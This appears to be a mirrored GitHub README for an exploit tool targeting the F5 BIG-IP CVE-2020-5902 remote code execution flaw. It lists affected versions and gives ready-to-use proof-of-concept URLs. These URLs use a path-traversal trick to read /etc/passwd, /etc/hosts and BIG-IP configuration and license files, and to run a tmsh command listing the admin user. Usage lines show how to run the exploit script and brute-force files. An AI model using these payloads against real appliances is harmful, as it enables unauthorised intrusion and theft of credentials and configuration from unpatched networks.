yasserjanah / CVE-2020-5902

exploit code for F5-Big-IP (CVE-2020-5902)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2020-5902

exploit code for F5-Big-IP (CVE-2020-5902)

Summary

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Proof of concept

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Usage

$ git clone https://github.com/yasserjanah/CVE-2020-5902
$ cd CVE-2020-5902/
$ pip3 install -r ./requirements.txt
$ python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd

-b to brute force files from a wordlist

$ python3 exploit-CVE-2020-5902.py -ip <IP> -b

About

exploit code for F5-Big-IP (CVE-2020-5902)

License:GNU General Public License v3.0


Languages

Language:Python 100.0%